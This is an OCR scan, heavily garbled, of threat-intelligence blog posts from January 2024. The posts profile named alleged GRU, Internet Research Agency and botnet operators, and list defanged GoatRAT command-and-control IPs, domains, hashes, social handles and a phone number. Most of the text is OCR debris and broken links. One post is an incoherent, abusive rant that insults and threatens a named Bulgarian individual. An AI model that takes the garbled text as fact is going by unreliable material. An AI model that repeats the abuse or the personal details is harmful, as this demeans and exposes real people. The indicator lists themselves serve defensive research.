=} 
“NI 
wn 
w 
B 
< 
8 
uel 
a 
an 
ha 
iw] 
H 
qq 
y 
bp 
> 
wo 
B 


WwW 
Ww 
co 
ct 
ue] 
a 
~N 
SN 
ion 
H 
° 
09 
0Q 
lo) 
R 
09 
° 
° 
(ie) 
Hb 
© 
fe 
a 
to) 
4 
fa) 
° 
(=) 
ct 
0) 
=] 
ct 
fa) 
° 
B 
N 
H 
=} 
(ie 
N 
lon 
N 
Ps) 
iS) 
o 
< 
N 
iS) 
tal 
H 
N 
> 
= 
< 
al 
a 
sz 
= 
uv 
B, 
co) 
Ay 
=) 
0 
[?) 
5 
(an 
os 
ion 
a 
5 
H 
° 
4 
oa 
= 
=] 
a 
oO 
= 
Ps 
(oe 
oq 
Q 
Q 
00 
Q 
H 
g 
Oo 
fag 
N 
rr 
w 
re) 
Fh 
> 
© 


Z6aHtah7BFCOyfE1MkYs49umHPBGDTv4a7-KO7HIkXMayn_wAf8I0q 


WwW 
ms 
ct 
ct 
uel 
a 
~ 
~ 
a 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
n 
(0) 
8 
fa) 
ie} 
B 
ct 
(0?) 
B 
ct 
fa) 
ie} 
B 
~ 
H 
B 
0a 
~ 
a 
~ 
wD 
iS) 
xe) 
<g 
N 
i) 
fa] 
H 
~ 
Pad 
< 
<q 
fal 
n 
ie2) 
a 
Q 
Fh 
Hy 
fou 
xe) 
< 
‘U 
wn 
as) 
xe) 
NJ 
w 
H 
H 
NS 
Kh 
ca | 
N 
ps 
a) 
Hi 
< 
(ye) 
fe) 
w 
ay 
Hh 
o>) 
ps 


Ni 
° 
i=) 

(ic) 

= 
a 
«3 
9 
o 
'uU 
fo 
ra) 


te) 
[o>) 
n 
‘U 
ol 
ian] 
is] 
(o>) 
yc) 
te} 
Eat 
(o>) 
oO 
iw] 
w 
@ 
al 
H 
gq 
mS 
N 
Kh 
w 
= 
= 
N 
NO 
Ww 
< 
ol 
oO 
wm 
NI 
= 
Qa 
iS 
n 
yy 
3 
ue] 
(=) 
Ni 
Ww 
oO 
fare 
(o>) 
o 
uo) 
© 
a 
00 


WwW 
ul 


ttps://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEhjUsR3ZF_Vt803U0 JKD5k6n-KRo9t jkaCt4-RyHeGkd9 
1RGOFscZ055MR7SUG4V018N JroN7Eafa0BLf£Q-9Mz0TiuoC9Jgyqrcp 


36. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhWISUdUBDQkmnrcGkS0i IvkRd1Z1FVeHUU- oE6iUxzFIb 
xESt_3egR-zK3G8Sn6tcS__hOXFkpf6wdiVD1Kzj YOFENQG2xVmilZx 

37. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhkeaHz5E01hZDNK6RzQr2E-LyUZfmzx3y JFyhLBeaQKI 
xE_5Tt_AIQhT-DW294uD99TiAF1Kv1-F539aMU-m_WDBekJireF40mGc 

38. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEjoSe9-LSy5iWIQoRraKMiuHkK Jm8vyN4FOTiNYErgL4sY 

r Jp9e6zIEUqGC- Aa915c5q0UXe8wbSjz41uFmVQ1eKewcbVef70LQ9D- 

39. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEiVs9XalWehVTLLjn7R8£ o03WuBtz3N6NQq78aMf vFIf-¢ 
z4wBHbAqOwP JG7c5d00cOU_3K3nCnMmF JhMvz3Xq_BZLW50bJ Jnk2bL 

40 ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEiUkN2_DQTdmybCDSTGy6bHS9tulo9boP7woS-ofejmnh- 


5 
Bq 
Pe 
S) 
n 
a 
a 
0) 
a) 
ake 
| 
H 
ion 
sa 
yj 
a 
= 
ol. 
8 
Ee 
eI 
ct 
x 
x, 
© 
N 
a 
a 
Q 
° 
vu 
IN) 
te 
aD 
ws 
KS 
co 
Q 
on 
09 
is 
To) 
ima 
N 
Parl 
B 
col 
fe 
5 
ue) 
A 


ct 
ct 
uc] 
n 
~ 
~ 
ion 
# 
fe) 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(?) 
i= 
n 
(0) 
8 
fa) 
° 
(=| 
ct 
(0?) 
=] 
ct 
fa) 
° 
B 
~ 
bE 
B 
oq 
pa 
lon 
~ 
Pel 
N 
oo 
i] 
N 
NO 
tal 
H 
So 
Pa 
< 
<g 
asl 
n 
az 
pb 
ct 
x 
G2 
Co} 
tat 
nS 
QQ 
qQ 
is] 
G 
5 
oO 
° 
Q 
be 
n 
Q 
ws 
ay 
“I 
+Q 
oO 
= 
Db 
Qa 
o 
Ie 
bat 
(o>) 
Hh 
(o>) 
iw] 
H 
Q 
B. 
an 
w 
ry 
iw] 
(0) 
ro! 


1. 


sNvMjDMqc4PyvpDQWK7qadRoPexhgyBr9h890wueNwH1-sm_1eM2j1 
42. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhpAD29-K_hyphenhyphentL56ciTFgBZiZafNqfu4u08E 
V9_4gN-Q5USqe3833sGFGHKQ£kPmv71En1irYFMz-s15BgMZO0b9XV72Z 


N 
N 
ol 


Ww 


ttps://blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEjwFnhPpy2XhpAH9bj LwbCsOZbxucSrwtsso0T9C4ZhAe 


sxuT3c-Uvg0sDTe0GPgxJxbvMmpkc8xD jXZu6DockjZBORq1vHxcnxa 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhETWCHEpdX9H5qwWQ j prL9UVLwomyKakYnHaT jnqNKJN. 
yHRmuZn8DIcjUGm61kdfNYyhShQmBHruYbROGBHhJchWxVih1j1FqkUH 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEiRpqMBXIBhZOs5cbuKhucV7Cdy6WKd6nib8eyA0XbjbiE 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhaC1cC- vMT7QmI01YsLcf9Fp4ezoo0 JmymkAfGLFb4c7- 


cvTmErvr68gHrzv8E5v/7GIc7qMOM1VrpfFeiwJCp5QLnROc- 3£04D0R 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhv7tEf 7 YVfp7yazkAORsCjHX8uiofmt-t31CvTZE9 jpT 
ROcvtpmbGGZUEbxE_FNA_o0zjAs2DprBnQ70xZqNwA_Dh30X6 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgAk4G2anmg IuSrCD8BpL8DFA4R4nEENXC J2MX j wnAo1WC 


Uf2wsjAxlmlrVr6gy8NiLf-1tsdFRa_wqjpE2MxhJDEsHsM17_HQck 


> 


= 2 . P~ =} - 
Oye; D Iog | 
N av 
o ez] 
eH a 
' ~ 
tal 
(ov) 
< 
N 
0a 
o 
0a 
w 
N 
~ 
=a 
bal 
oe) 
oO 
PS) 
foe) 
w 
Bs) 
fo) 
Q 
oO 
a 
(an 
[o>) 
R 
= 
© 
us 
B 
Q 
w 
es 
iw] 
2 
‘o 
Qa 
<q 
<= 
09 
ua. 
i= 
in” 
ua. 
= 
Ww 
B 
Q 
Hh 


1h TS 
Xe} 
ct 
ct 
uel 
a 
~ 
SS 
a 
Bp 
fe) 
9a 
09 
0) 
A 
09 
[e} 
ie} 
09 
H 
() 
c 
a 
(0) 
R 
fa) 
ie} 
B 
ct 
0) 
B 
ct 
fa) 
° 
B 
ee 
be 
B 
(i) 
S 
a 
S 
De 
NO 
Ke) 
<q 
N 
i) 
ps 
H 
™~ 
> 
< 
<q 
fal 
n 
isa) 
09 
Ke) 
N 
B 
ws 
<q 
ar 
B 
jo) 
ra 
[53 
< 
=a 
i) 
= 
H 
c 
i) 
a 
ct 
N 
H 
gq 
tal 
09 
foe) 
AJ 
(rz) 
p=) 
is] 
< 
09 
w 
wa 
o>) 
a) 
0) 
N 
< 
1) 


Ckts4MKg3VozmF OkLfXDSbo0albrF J6kImueRmdZtQtr918VyJMInd 
ttps://blogger . googleusercontent.com/img/b/R29VZ2x1/AVvXsEhdRKEQhoDCYZb1 vhz2M90xKHZws1R71AJJifclpJP-t9 


sxI5FJ_XKLFKYYE4jQtVnvjEb784tTtGuwj o68Dyn8M9RWCRzzDt2hm 


51. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEiEi je8e08-DTU1LDR219rYObWimz5Mo_V-Oe8dtcG7_eXg 


ul 
| 


> 
oO 
wn 
< 
ra 
a 
N 
i= 
0Q 
aS 
oO 
oO 
Q 
~N 
w 
=! 
< 
Ww 
S< 
< 
4 
ct 
Pad 
G 
iw] 
is 
oO 
ar 
Pad 
Q 
re 
< 
+Q 
N 
= 
wn 
=a 
09 
ct 
Q 
re 
ct 
Dn 
[on 
N 
NO 
Hh 
H 
a) 
H 
© 
= 
ta 


ul 
N 


ttps://blogger. googleusercontent.com/img/b/R29VZ2x1/AVVvXsEh3V1IxtAsO6L7ROOchgRSHMXDyvmkZ yho4k jagwuGm4 


fa) 
oO 
Co. . 
rer 
i=] 
0g 
<g 
oO 
ct 
w 
fo) 
@ 
nw 
a 
> 
0a 
n 
n 
a 
ol 
oO 
=] 
cal 
() 
w 
a 
< 
© 
an 
tal 
fan 
o 
SNS 
{ie} 
| 
i= 
iy 
K 
w 
as) 
=] 
= 
NO 
be 
N 
tol 
a 
Q 
Pr 
H 
tal 
n 
n 
ww 
<g 
N 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEi_tk5-Ne57sHVOJB- XAnuKb6TFi6zNwaC8B4dXa8Srrp 
FNFQU- 
ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEhoFnIdLCRuikRTspBNI9L- gQMwVf226Pq7n2fHGvkWdN 


ul 
Sa 


+Q 
ct 
0) 
= 
N 
B 
fo) 
ps 
Ni 
fH 
N 
Kh 
ao 
‘Uv 
Et} 
=4 
ct 
0) 
< 
iS) 
“NI 
N 
p=) 
ct 
Q 
ct 
rr 
= 
= 
yy 
Bb 
p=) 
a 
=] 
N 
Q 
Y 
uc] 
n 
y 
S 
= 
0Q 
fee) 


u 
> 


es) 
ro] 
N 
i=) 
fH 
ASS 
CS 
ao 
yr 
ie) 
ie) 
09 
N 
c 
wn 
oO 
| 
= 
wn 
j=) 
a) 
G 
< 
=") 
ao 
N 
H 
=z 
=~ 
w 
: 
4 
B 
yy 
ua 
o 
rv) 
H 
= 
re) 
a 
oO 
n 
2 
Gl 
(=) 
+Q 
ct 
re) 
p=) 
Fh 


ttps://blogger. googleusercontent.com/img/b/R29VvZ2x1/AVvXsEhXqt vo0S644054Y J- EdE6Y6c JC2u9sE04XxLVz72k2c0 
u-guRUm- 


ul 
- 


S< 
(0) 
S< 
< 
=] 
Fh 
nz) 
fo) 
a 
H 
4 
oO 
q 
= 
4 
@ 
Pad 
> 
o 
Be 
iw] 
ica 
qQ 
es] 
(0) 
qQ 
H 
be 
S 
tal 
= 
uel 
o>) 
w 
i= 
=) 
a 
Pa 
N 
Qa 
Ay 
oO 
r 
N 


ul 
[o)) 
ct 
ct 
ue] 
n 
~N 
N 
ion 
B 
° 
(ee) 
09 
© 
R 
0a 
° 
° 
0a 
H 
© 
is 
n 
a) 
R 
a 
° 
5 
ct 
to) 
B 
ct 
a 
fe) 
B 
N 
E 
B 
oa 
N 
jon 
N 
w 
ie} 
oO 
< 
N 
No 
bd 
H 
N 
> 
= 
< 
> 
n 
isa) 
(je) 
K 
N 
ae) 
° 
nN 
H 
eet 
NJ 
ha 
00 
is) 
ue] 
> 
is) 
rs 
° 
0a 
oO 
H 
a 
-) 
N 
q 
ct 
Oo 
= 
=) 
b4 
a 
Es) 
pH 
“ 
is) 
=a 
5 
a. 
qa 
Ee) 
= 
N 
Hh 


Ept13D9yzq9n0GKntduai1SHBrwOT7hqNhi_Q1LIGYT75cscQ33-bU 


ul 
N 
ct 
ct 
uel 
a 
~ 
~ 
o 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
a 
(0) 
fa) 
ie} 
B 
ct 
() 
B 
ct 
fa) 
° 
B 
™~ 
be 
B 
a 
~ 
o 
~S 
w 
NO 
Ke) 
<g 
N 
iS) 
fa 
H 
~ 
Pa 
< 
<g 
fal 
n 
isa) 
09 
[=] 
a 
col 
N 
H 
4 
dp 
5 
~@ 
a. 
“Ni 
fe) 
ao) 
a 
fe) 
a 
p@ 
a 
i) 
a 
(oe) 
fo) 
Q 
wv 
ue] 
nS 
Qa 
io” 
Ke) 
B 
iS) 
OD 
N 
= 
09 
eo. 
Q 
iS 
be 
@ 
0a 
Fad 
a) 


Rf VrOBoBg62HX1q1VU3VptMsmXYBXD6TVkx_WBgvtizIVfxwPzwYy 


ul 
© 
ct 
ct 
‘oO 
n 
~ 
Ss 
o 
H 
fe) 
(ue) 
(ye) 
(0) 
Ri 
0a 
° 
fe) 
09 
ma 
(0) 
c 
n 
(0) 
8 
fa) 
eo} 
B 
ct 
(?) 
B 
ct 
Qa 
° 
5B 
™~ 
b 
=I 
(ec) 
~ 
oO 
~S 
Pe) 
N 
No} 
< 
N 
N 
p4 
an 
~ 
Pad 
< 
<g 
fal 
n 
ica] 
(ah 
N 
a] 
Fh 
() 
e 
bo 
ir] 
os) 
= 
at 
w 
oe) 
ae 
yr 
Q 
(a 
[o} 
dp) 
b 
qa 
Ps 
| 
o 
© 
o 
wa 
cj 
o 
o 
Sa 
is] 
Q 
0a 
w 
w 
foe) 
wn 
= 
o 
ct 
eho) 


Q 
Kh 
< 
0a 
oO 
N 
a 
Q 
A 
tal 
0a 
i) 
oO 
ro) 
= 
ua. 
=] 
5 
ud 
mr 
= 
iS 
= 
n 
G 
B 
ina) 
jw. 
oa 
K 
oe) 
ez) 
Ee) 
a 
to 
nS 
iow 
Q 
H 
wn 
x 
Q 
> 
= 
yr 
oO 
fo) 
Ww 
oO 
ct 


ul 
oO 
ct 
ct 
ue] 
a 
~ 
S 
o 
# 
fe) 
09 
09 
0) 
5 
09 
ie} 
fe) 
(i) 
H 
(0) 
c 
na 
oO 
8 
fa) 
° 
B 
ct 
0) 
B 
ct 
fa) 
fe} 
B 
~ 
be 
B 
oa 
SY 
o 
S 
==) 
NO 
xe) 
<q 
N 
iS) 
fa 
H 
~ 
> 
< 
<q 
fal 
E 
p 
a 
° 
co | 
KB 
o>) 
5 
(0) 
qa 
fa 
col 
c 
a 
fo) 
ul 
Ps) 
H 
a 
+Q 
iw] 
+Q 
B 
K 
» 
n 
N 
Pe) 
i) 
> 
Qa 
p 
<q 
Ee 
oO 
N 
5 
w 
H 
w 
qa 
Ss 
= 
(0) 


UVCipugHbpCNaVKC7 quVnh9cZTBdqgLhOJe-y4WkXBBjf£1Qq32knk1 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgFLmgertICxwrlJajxZjZPZ11_KcBJ62TR3XI1YlaFjk! 
G7KkdsXsBDrV2wpIQ2x4Xn-m6_OmQnSmSrpM93HcDkJTp1SqZhJLkS _ 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEikirF61_h4wmP51LIfUL3B5y1£YrBOEUEAP3B-ZeDFeJ 
cWzif99ft_1_iRFEy-T4RpZDBOeOr_HuCTLEUDhyTb06_L1E30iz9r 

ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEi614dw70_D86tTYBT_S_G1dJO-h61PO0FekIzdxw3UD4D 


{e)) DIF|ADIRIO 
WN BR Oo 
Be 
o 
R 
< 
= 
ies] 
B 
“N 
is) 
<7 
a 
(0) 
oO 
be 
a) 
oO 
ps) 
n 
09 
=F 
ad 
re 
ct 
© 
(a) 
Ss 
Re 
<g 
w 
(i) 
= 
Kh 
i=) 
as) 
ae) 
a 
iow 
Sg 
R 
oO 
is) 
m 
~@ 
Kh 
a 
n 
o 
e 
=a 
IN 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgQxs5BROY 2UgHnqnF gj DxKk9XXWrv2Ud-fdBFuglrcTZ 
H-NeqMYZFaJwcWskoDTS62SqHACKuQq0k8390Tx1g9Qvg3v800G8tr 


U- 


(o>) 
nS 
ct 
ct 
“ol 
a 
“ 
N 
ion 
H 
fe} 
(¢] 
09 
0) 
5 
09 
° 
fe) 
09 
H 
0) 
c 
a 
0) 
5 
fa) 
° 
B 
ct 
0) 
B 
ct 
fa) 
° 
B 
~N 
Ee 
B 
0a 
N\ 
lon 
N 
Pe) 
N 
oO 
< 
N 
N 
ps 
H 
~N 
> 
< 
< 
fal 
n 
ina) 
ua. 
5 
ps 
p: 
Kh 
fo>) 
B 
Qa 
© 
Qa 
O) 
° 
Ny 
5 
BS 
a 
ion 
5 
<4 
AH 
N 
So 
H 
io] 
] 
=} 
iS 
“Ni 
= 
=a 
n 
qQ 
ay 
< 
= 
oe) 
N 
So 
Ww 
G 
pr: 


nY sTI0TVQdRMGQXs81LkyWevk-HO028 jnkPYqoISGvKo49KfW39WPEq64 


(o>) 
Ul 
ct 
ct 
uc] 
n 
~ 
~ 
ion 
H 
fe) 
9Q 
oq 
(0) 
09 
fo) 
fe) 
{he} 
fy 
(0) 
c 
n 
(0) 
fa) 
fo} 
B 
ct 
(0) 
B 
ct 
fa) 
fe) 
B 
~ 
bE 
B 
(te) 
~ 
lon 
~ 
Pe] 
N 
oO 
< 
N 
N 
ps4 
an 
~ 
Pad 
< 
<g 
tal 
E 
i 
uc] 
B 
fo) 
ps 
Q 
N 
B 
(0) 
S< 
fe) 
ir] 
H 
n 
ina 
iS 
re 
(0) 
4 
<4 
=a 
N 
ion 
Fh 
=a 
wa 
fo} 
ct 
ion 
< 
=o 
ps 
n 
b 
S< 
oO 
Ct 
N 
iS 
io) 


K_8QTb£XzUnsKjtWkPGTBCk12tg37qkbhcLGDR5OtN6JcOuagrj7JY50 
ttps://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgh9dFXX j ] E8BRUNdcQs-ScebrvZH1FXrIGsuND4YAvFOD 


fo) 
ao : 
q 
z 
ct 
SS 
Fh 
o 
Fh 
Pal 
N 
a 
iS) 
4 
=] 
Ay 
B 
© 
ro) 
H 
: 
SS 
9 
iS) 
S 
n 
o 
N 
isa 
[= 
va 
tan 
o 
i) 
a 
A 
° 
R 
\=5 
0 
A 
N 
9 
g 
3 
my 
Q 
o 
x 


ttps://blogger . googleusercontent.com/img/b/R29VZ2x1/AVvXsEhbkvvpvQ8x4AHVVUIn6daCZS_EScpnTt8yrWuxj0jrbA' 


rd 
= 
=) 
n 
nan 
0) 
oo) 
© 
m 
Hh 
Ee 
in) 
5 
Me) 
& 
S) 
= 
2 
Go 
ion 
BD 
SI 
R 
R 
= 
> 
a 
° 
a 
q 
oo 
Fh 
00 
jw. 
0 
I 
oo 
i 
=) 
N 
rt 


ao 
nae | 


' 
mw 
+Q 
'U 
Fa] 
2 
yy 
ct 
on 
N 


N 
N 
oO 


kH4TKFEKJ1Wk9Rw1kHUr j 2401GUzzOHyxCHNtULLLXtC9cY18g0mXR9 
69. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEhyHNtafeg5 jrd3t8xNUHzaPTv3gkAsstrdwOLUwewnlK9 


OuGfCqWRSU- 8KdHZHMUHuR- gTdU6VxRw-WBus3ekShmjthRxNkgqEYrd 

70. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEiifWul-yj811j j2nDzA- 2bPW4- gqI09af c2yvaD5dqX5P 
71. 
72. https: //intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers- 2021 

73. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEimLTXSAEbo10RjDuJc7 J3HqLHQcTYihiAsigxDzn2RwS 


1Tktemwt- XqD2m1HUiU31Sobt7pxwyfn_Ah7wNcluLEW9m0QQbO0PxcQ 


68. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEigz_KwtxtxMENDJp8ix-uppJzX3ak301kbs4wrHEJdrFb 


2.1.2 Profiling Anatoliy Sergeyevich Kovalev from GRU’s Unit 74455 "NotPetya" Mal- 
ware Gang (2024-01-07 01:37) 


8 Esrexuit ODegopos 
Peituur: -52 VKR 
[1] avit Crpanmua: id702871912 


including my research [3]here. 


An image is worth a thousand words. And so is a [2]link 


Related links: 
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hxxp://vk.com/id702871912 
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CTpaHa NpooKuBaHna: Poccua 

Topog: Cy3emka 

Bpicwee o6pasoBaHne: 

By3: BIy um. Netposckoro , 1989 

@akyNbTeT: OvsvkO-MaTemMaTMY4eCKM MakyNbTeT (ECTECTBEHHO-Hay4HbIi MHCTUTYT) 
Cpeguee o6pa3oBanne: 

Lukona: Wkona N2 2 , 1984 Cy3emka 

Tekyljan QeATenbHOCT: BIY um. NeTposcKoro 


[8] 


229 


[9] 


230 


231 


[10] 


[11] 


232 


233 


[12] 


ie 


[IEPWIOTPABEHCbKA CIABCLKA 
rPOMAAA 
HACEAEHHA IS44 4OA. AC MAOWA 71838 TA 


a 


A30RE MANPNEMGTBO 3AT.RIOKOMON, AriNPOBCDKNI 


Pr 
ads 
re 
. 


= 


1. https: //blogger . googleusercontent. com/img/b/R29vZ2x1/AVvXsEh1ig7cmI AX4VSqm9EEDOkSqK IxTezQALuT5FxeLTqHZBW7K 
ulQMSn0qAWsVOafKAl4w4tb4FF27ZqsrCGeCDIbgV7_JOlrinsGLKV 

2. https: //rewardsforjustice.net/rewards/anatoliy-sergeyevich-kovalev/ 

3. https://ia804709.us. archive. org/27/items/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure 
-2/Exposing/20GRU/27s/,20Unit%2074455/,20_NotPetya_/20Malw 

4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEgtmCMGOha1_oVhb7kS9GPsLrbBLOZKnMUEd5bkDRt8z5ceZ 
iCmQ8u4VTxgkVF j GUKOSASSHbwR5puz6DXxa3IH5QBjLdbmbcZ0E3Q 

5. https: //blogger. googleusercontent.com/img/b/R29VZ2x1/AVvXsEgUJRNy8JgWf£mTFUhO8SQ6YvXmAZdJr IwCdY J7Zpjb4rxQ1P 
bivWOm3U5IsOuv4g58C5-oxRHBalaBYHLbrVNf IIsciXZ4VhG1N1_p 

6. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgsEuSP7tHacghnruuCoGcZn78RY7HA_Qqn-zVyuKSJ86Ed0 
IN1EglhkbF652vrQTh3ZL10CacpO0n3SscyoPOnI6czD4dnBdj-8Ira 

7. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiU3haTq01Y9W7U-L- v9QbBuleHIRk3hfny_3jad3G_zhSON 
ceiQMGzLdUg5LmVe2Bhh0ic8XI4pPjV1_VPxBCTKIYMBsSQku3VGwc 

8. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEiziZjqb- IFW5yU8YDYohxnYSvDhSf SWOaQKWsvFQJtR4Pd8 
7WHECKZOjmT_rM- ez1KFEnXWHQXNDZ_PojbZ3DiTTL3dwfsywIp5ev 

9. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEg-ntH1UbybB4ILZrg5emEnmbH9CgnZ- 9cUt jpgs_z4j gmwH 
_UAtzcKWLQLJso2HQE67xyKzeylvkzFK2FxVK0ajB2Yj551M-gpAR5 

10. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEhZdCAyDknZdS5xWS_c_8D-AtD_8sI8vG1Fq7_7m59W4K5 
oGRgKlygJ2MtM181M_19sMu_24w2nBt1kCOwItiYtvDuRUJArzZO0d8rx 

11. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhkvapZTWvXXiToKB2u4AkxxrnlugiEcitPQRFXmbG6Nq_ 
B4Nf iytvP4jCxqE40JqKb7£ IsXMOHfFX1k016v5eUxgvAMmHUUjW94Eq 

12. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh8BRMsXQzRr68DFnZ8gcf4Y17pc j8sqbD7FqheEhmnD-c 


234 


BAZDvV9EyR86D1XM3I sbdBe9VP703x_GO6yDO3AF3PM_xTukWxUztcS 


2.1.3. Where Is Anton Nikolaevich Korotchenko (AHToH Hukonaesuy KopotueHko) 
Also Known as Koobface Botnet Master KrotReal? - Part Three (2024-01-07 10:05) 


[1] 


An image is worth a thousand words. And so is a [2]link and my analysis on the Koobface 
botnet [3]here. 
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2.1.4 The Deepest Gipsy King of Them All? - Yavor Kolev - A Dipshit Courtesy of 
Republic of Bulgaria on the "International" - "| Have Never Left the Country" 
Law Enforcement "Scene" (2024-01-10 04:35) 


Re 


[1] 


239 


Can you recognize apologies spot a dipship when you see one? Can the recognize the degra- 
dation between his teeth or what would some other dipshits courtesy of him that don’t exist 
would consider something that doesn’t exist to begin with the very presence of a human being 
his teeth and relevant face sculpture to begin with? 


This is not poetry. This is the deepest ugliest and most disgusting presence that | would stay a 
million mile away to skip his relevance of existence to begin with. 


There’s a saying. The ones who are distusting are disgusting at all. Beware and don’t even 
bother the elaboration on this. Watch out for the irrelevance of these people and try to avoid 
them to the bottom of your brains out and there’s not such word as out. The dipshitness of 
your overall irrelevance is bothering other to be bottom of their irrelevance. The result? You 
don’t exist. At all. 


If you can spit it try to vomit it but vomit the bottom of your brain’s and idiocity’s irrelevance 
to the bottom of your brain’s out. We will find and beat the bottom of your irrelevance out to 
the bottom of your irrelevance out. You’re a disgusting presentation of people who dipshit on 
each other and then skip the breakfast. And guess what? The dinner. 


Stay tuned. But you don’t. 
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KamnUzUgXaCRx7 fR3n0DE4rf 3111Is92Y1VQV8hJbTOo1LOENWJIs9Qo00K 
41. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgRzL- pF IEOdS6qEF56GVHdI YkHVUMLkPbuaZhyH0ebMqJ 
E6Pu0OBvTSWOaK- V9SNOnnBbbhOTImJcJiGpanp9dG3U_q6gtkHvYQA5R 
42. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEh2waS5zpnWmHPnwFDzr901YaCHOrQk-Dz1gAMLZAEYWv_ 
bocC6CZN6SyAnpOVNbOSOOYOp2kT5Xs6QF819G_U0pLv27G9 jmkgqGuh 
43. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEgk 1hf 4vew8kBpnxgNUCD87NLduIaa0BZe9dcEOKMP3asq 
Bz7DEvClh7Sqfy1ld_TnFaiCKAUdV5Bk199Gp13A-3jhwzD3di-BGxKGY 
44. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEgcn09pxDvzhkm6t VKF chGzX50sEdb7CnahU4wWOnXHVop 
VR4Q3wuf tat 3PXobMEf IhN1k_mJdrRox1DVARwGatoGICc3hHGzm2eyd 


2.1.6 Profiling Internet Research Agency’s Anna _ Vladislavovna Bogacheva 
(2024-01-12 22:08) 


[1] 


CTABPONONb S| | 


An image is worth a thousand words. Here’s the [2]link. 
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[3] 


1. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEj3YGUsAy0vyG6SzbTz53zhasCnLdBPSov6z2ywYDSgBKN1- 
Z9358VR90al 9MTTq8vW_A1lb1KsOXvmihzZVVGgDBI1qz043H4ZK1 


2. https: //www.fbi.gov/wanted/counterintelligence/anna-vladislavovna-bogacheva 
3. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEirxwytZjRKXTOZx3uAeUr J£U98LFaq6vHgLfG1iCs6koRe 
JosVdTb6m2QReqORMy IPnswm6eHQ1xNzio8MctceERJE2KpnRZ9Zff 


2.1.7. Who’s Behind GoatRAT? (2024-01-13 23:01) 


Usuatio 


Senha 


ACESSAR 


In this brief analysis I’ll take a look at who’s behind GoatRAT in terms of social media activity 
C &C servers and actual personally identifiable information. 


Personally identifiable information: 
hxxp://bit[.]ly/nubankmodulo 
hxxp://goatrat[.]com/apks/apk20[.]apk 
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Sample MD5s: 
6583a9b6b83738e0bf2a261fc04483e18772da3241e467fdef37a8e27b1869a7 
9a8e85cflbbd32c71f0efa42ffedfla0 
hxxp://api[.]goatrat[.]com:3008 

Social Media: 

hxxp://t[.]me/sickoDevz 
hxxp://tl.]me/goatmalware 

Web site: 

hxxp://criminalmwl[. ]fun 
hxxp://clientes[.]criminalmw[.]fun 
WhatsApp - +5511987457894 
ba5833b49e2c6501f5bbce90b7948a85 
Code Signing Certificate Signed By: Mr[.] Paxton Doyle PhD 
SSL: 94ba7810ecelalb227e6a5b509c8bb228e7285ala5cee5f0ee26542783d4b09a 
Sample C &C servers: 
104[.]244[.]75[.]74 
138[.]197[.]166[.]92 
142[.]251[.]143[.]110 
142[.]251[.]143[.]129 
142[.]251[.]143[.]142 
142[.]251[.]143[.]163 
142[.]251[.]143[.]193 
142[.]54[.]162[.]114 
159[.]69[.]27[.]103 
174[.]128[.]250[.]164 
185[.]204[.]1[.184 

185[.]225[.]68[.]133 
188[.]214[.]132[.]49 
216[.]239[.]32[.]36 

216[.]239[.]34[.]36 

31[.]133[.]1[.]108 

51[.]148[.]150[.]203 

51[.]81[.]93[.]37 

80[.]241[.]214[.]102 
82[.]128[.]229[.]109 
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93[.]115[.]91[.]66 

95[.]216[.]209[.]129 

Sample C &C servers: 

tgutjgo6kvqdst5ock[.]Jcom 

olbvu5pv2apkc57zfeg[.]Jcom 
hxxp://h4j7ewfdpwfzg6g6[.]com - 185[.]177[.]206[.]72 
hxxp://3ajzfjsxou4yzn3jw552dg[.]com - 87[.]236[.]195[.]198 
hxxp://f53ia7Iqhbg54y7xd7ydp3[.]com - 178[.]63[.]41[.]183 
hxxp://lblhluz7or[.]Jcom - 178[.]63[.]41[.]183 
hxxp://inylslu7vfq24vb[.]Jcom - 185[.]177[.]206[.]72 
